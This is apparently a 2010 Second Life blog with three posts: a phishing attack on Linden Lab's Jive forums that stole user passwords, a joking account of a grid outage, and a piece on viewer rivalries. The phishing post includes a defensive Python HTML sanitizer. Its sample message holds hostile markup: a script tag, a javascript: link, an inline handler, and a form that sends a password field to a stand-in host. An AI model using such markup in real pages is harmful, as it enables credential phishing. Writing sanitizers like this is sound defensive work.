Thursday, 6 May 2010

Something Phishy About Jive!

Yesterday saw another example of LL's poor decision in adopting Clearspace's Jive software for their new forums/blogorums. The Jive-powered blog software, an alternative to LL's now scrapped vBulletin boards, fell foul of a simple phishing JavaScript, which harvested hundreds of user names and passwords.

A presumed Russian user going under the account name "Aels Cybertar" placed some JavaScript in a private message (PM) and sent it to an as yet unknown number of people. The message arrived in users' inboxes as a message from Aels Cybertar titled "Hi, remember me? ^.^". When opening the PM, the phishy script asked for the users' SL account name and password in order to read the message, as seen in the pic below.

While some might say that people should have noticed this, it has to be taken into account what a borked piece of software Clearspace's Jive is. There has been an endless stream of criticism of LL's decision to adopt it, and users have demanded a better system to work with. Recently, though, Jive was upgraded, leading to some user satisfaction, but this revamp seemed to add just as many new bugs to the system as new features. Some people had their whole profiles deleted or were unable even to log in.

One result of this upgrade was to stop persistent logins, forcing people to log in every time they revisited the pages. I am sure that this forced increase in repeatedly having to log in with your account details and password suckered many people into believing that Jive was just getting even more secure.
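The phish described above only worked because a message body could carry script that ran when the recipient opened it. As an added example (not Jive's code, and not the script from the incident), here is the defensive counterpart a forum backend would want: an allowlist-based sanitizer that rebuilds a PM from a short list of harmless tags, strips script, forms, inline event handlers and non-http(s) links, and keeps a record of what it removed so that messages carrying active content can be flagged for review. The sample PM at the bottom is constructed for the demonstration; the tag and attribute allowlists are assumptions about what a plain-text-ish message needs.

```python
import html
import re
from html.parser import HTMLParser

# Allowlist (assumed) of what a private message may contain once rendered.
# Anything not listed is stripped, not escaped, and recorded for auditing.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a",
                "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
# Elements whose text content must vanish along with the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "form"}
# Link schemes allowed; javascript:, data:, vbscript: and friends are dropped.
SAFE_URL = re.compile(r"^(https?:|mailto:|/|#)", re.IGNORECASE)


class PmSanitizer(HTMLParser):
    """Rebuilds message HTML from the allowlist, escaping all text nodes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []         # sanitized output fragments
        self.dropped = []     # audit trail of everything removed
        self._open = []       # allowed tags currently open, for balanced output
        self._skip_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.dropped.append(tag)
            self._skip_depth += 1
            return
        if self._skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip()
            # on* handlers and unlisted attributes go, whatever the tag
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
                continue
            if name == "href" and not SAFE_URL.match(value):
                self.dropped.append(f"{tag}@href={value}")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in self._open:
            return
        while self._open:  # close anything left open inside this tag
            t = self._open.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data))

    def close(self):
        super().close()
        while self._open:  # balance tags the sender never closed
            self.out.append(f"</{self._open.pop()}>")


def sanitize_pm(raw_html):
    """Return (safe_html, dropped) for one message body."""
    p = PmSanitizer()
    p.feed(raw_html)
    p.close()
    return "".join(p.out), p.dropped


def contains_active_content(raw_html):
    """Detection hook: True if the message carried an embedded element
    (script, style, iframe, form, ...), an inline handler, or a link with
    an unsafe scheme, i.e. what a credential-harvesting PM would need."""
    _, dropped = sanitize_pm(raw_html)
    return any(
        d.split("@")[0] in DROP_WITH_CONTENT or "@on" in d or "@href=" in d
        for d in dropped
    )


# Constructed sample for the demo: a friendly greeting followed by the kinds
# of markup a fake login prompt would rely on. Not the script from the incident.
CONSTRUCTED_PM = (
    '<p>Hi, remember me? ^.^</p>'
    '<script>/* stand-in for the fake login prompt */</script>'
    '<p onmouseover="alert(1)">Click <a href="javascript:alert(1)">here</a> '
    '<a href="https://example.com/">or here</a></p>'
    '<form action="http://example.invalid/collect"><input name="password"></form>'
)

if __name__ == "__main__":
    safe, dropped = sanitize_pm(CONSTRUCTED_PM)
    print(safe)
    print("dropped:", dropped)
    print("flag for review:", contains_active_content(CONSTRUCTED_PM))
```

The sanitizer runs on the server at message submission time, so the stored copy is already clean; `dropped` is what you would log and alert on, since a single account sending many PMs that trip `contains_active_content` is exactly the pattern the post describes, and catching it at submission is cheaper than resetting every recipient's password afterwards.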

LL did, though, disable all PMs when made aware, but shortly after that a user with the account name "Nykon Brunsen" posted the following message in a thread on General Discussions discussing the phishing incident:

Nykon Brunsen wrote:

"Lindens... it was funny.. u have no limits to users in one PM =)

u scripted sending via ID, not name... That you have made the only thing correctly - have disabled PM. Here that I have received. Enjoy. PS. from russia with love^.^"

There then followed an 18-page table listing the IP addresses, browsers used, account names and passwords of all those he had captured through the phish. Whether it was the total haul or a small sample we do not know. I have reprinted an edited and extracted version below with IPs and passwords removed. Although LL say they have reset the passwords of all users who were sent the PM, whether they opened it or not, some people are already saying that this is not the case.

The Flogs remain up today, although all functionality/HTML has been disabled, so it would seem the Flogs are still not secure to use. This is a big egg-on-their-face moment for LL and Clearspace, as it effectively shows that all of LL's security procedures were bypassed by one simple phishing exercise. Not only that, but it was conducted on one of their own sites, over which they have received much criticism for their use of Clearspace's Jive software. The phishing exercise for the moment seems to have been done for non-malicious purposes, to show LL how open their system was and how lacking Jive was in protecting them. So far I've not heard of any user reporting missing inventory or money. The posting of users' account names and passwords on a public forum, though, can only be considered ill thought out and criminally negligent.

Below is a shortened list of users who were caught. There were 18 pages of names and passwords, and I include only 2 extracted pages here, with IPs and passwords deleted, as an example. I had to chuckle at one of the users who was caught and who had used a really weak password. Last week they were boasting in a forum of how, with their long, long experience in IT and in installing and maintaining big corporate networks, they could run LL's data centres and would have avoided last week's outage. Good to see that such superheroes can get phished and don't know how to set a strong password. I hear that Prokofy was also hooked by the phish; she'll be relieved to know that her details didn't appear on the list that I have.

Edit: Prok has a nice first-person report of it here.

If your name appears here, then I would advise you to change your password if it has not already been reset by LL.

Thursday, 29 April 2010

They Tooks My SL Away!

SL residents/users/customers/addicts went apeshit crazy today as the guy on the corner of the internet, who sells the good stuff, was mysteriously absent for most of the day.

Some dumbstruck, and in some cases just plain dumb, people hit the login screen to find their access denied because the whole of SL was down. Not just the grid, but the websites, the blogs and, if rumour is to be believed, even Mark KingDonk's Thunking Machine, though further rumours persist that it is just a Hoover he turns on to make the residents' voices go away.

What people did for those nigh on 12 hours is only now slowly becoming known. No doubt in several cases some were exposed to sunlight and were desperately reaching for a gamma slider. Others discovered hitherto unknown siblings, or piles of mail which forced them to remember their given name at birth, and I daresay some even took the opportunity to change their underwear.

Relief wasn't too long in coming though as the Linden Overlords whipped the hamster wheels into action and lights started coming on across the grid, and going out in bedrooms and basements across the worlds. The SL Flogs, once up, were soon flooded by a previously unknown group called "The League of Idiots". I swear these people must have been sat in front of their monitors pressing refresh every 2 seconds till the site came up.

Once on to the blogs, their first question was, "What's happening?", unaware of the fact that they were the only person around to answer it. Soon the rest of the league were turning up asking the same question over and over again. One suspects it was the tightness of their new underwear or the residual sun glare in their eyes that had caused them not to see the Grid Status update on their login screens properly.

Once the initial wave of idiots had self-sedated and calmed down, there appeared on the scene "The Regiment of The Righteously Outraged." These people had serious questions and wanted some serious answers. Nothing less than KingDonk himself being hauled into the court of public opinion and made to answer as to why SL was down while they slept in their beds was going to suffice for these people. Various members of the Regiment screamed that they needed to get inworld because they were concierge members and merchants and needed to be in their shops, oblivious to the fact that they wouldn't have had any customers or visitors even if they could.

The grid did slowly though, after some stiff drinks and flattery, open her arms and embrace again her long lost lovers. Even this long withheld fix was not enough to satiate the most ardent of the Green Ink Brigade. Back to various forums they came with some classic lines,
  • "Something I took into my inventory 10 mins before shutdown is now rezzed on my land!!!",
  • "I can't TP to my home, WHY!?!",
  • "I can login, why can't my partner ffs LL!!!!",
  • "I know it says there's inventory problems, but MY inventory isn't loading!"
To be serious for one moment: this prolonged outage has been one of the most serious ones for LL and all of us for quite some time. Whatever the cause is will no doubt be known or slowly revealed over time. It would be nice to know what is happening while we are all in limbo, but there are good commercial reasons why the likes of LL don't tell too much. Outages such as this one are acceptable and reasonable if they are infrequent. Older SLers will remember times not so long ago when outages were a weekly occurrence and scheduled maintenance day meant 3 days of rolling restarts to fix what they broke when they were fixing something else.

We, though, have to keep some perspective and restraint and not go so apeshit; there is always First Life, and it's not a bad place to log in to every once in a while.

To finish, my award for the most hilarious and ironic post of the day goes to...

Viewer's Discretion Advised

As a supposed 70,000 Emerald users breathed a collective sigh of relief this week, with said viewer getting itself installed in the TPV Directory, I've noticed an emerging bitter evolutionary struggle breaking out.

While the debate raged across various blogs and threads about whether Emerald would or should make the directory, its proponents, and users of other viewers, began to engage in a "throw it and see what sticks" battle. The argument runs,

Emerald user: "If Emerald doesn't make the directory then I won't be able to use (insert an Emerald function). All the other viewers don't have that function, therefore they are shit and I shouldn't be forced to use shit!"

Other user: "But why would you want that function? It's so retarded, you kid! No way does that help me do (insert creative activity), you should use my viewer!"

Ver.2/S20 user: "WTF! ZOMG! Are you two friggin' insane? Have you just stepped off the ark? Stop talking shit, my Ver.2/S20 pwns your n00by viewers! I got da, Media on Da Prim! You suck, upgrade now!"

And of course, it is at this point of unrivalled Socratic reasoning that both Emerald and non-v2 users will for one moment put aside their differences to beat ten bells of crap out of the v2 poster for being an asswipe fanboy/girl.

The truth is, they are all wrong and they are all right. There is no one viewer that satisfies all my requirements and needs, but there are some that are perfect for when I'm doing a particular activity. If I'm building I will tend to use Emerald for preference, or maybe Snowglobe, and if I'm doing more media-orientated activity then I will use Kirsten's S20.

The difference is, though, that I will not go round dissing any other viewer that somebody else uses. I am me, I do what I do in SL, and those viewers cover all my needs. I am building more and more with Kirsten's S20, and it may be that in a few months that will be my sole viewer. Even so, it will not make the S20 the best viewer in SL; it will just be the best viewer for me.

If we can't have the perfect viewer, which has all the bells and whistles, then the next best thing is that we have a range of viewers that between them provide all the functions we need and desire. This is what we have now, and it's a better situation than we've had for 90% of Second Life's existence.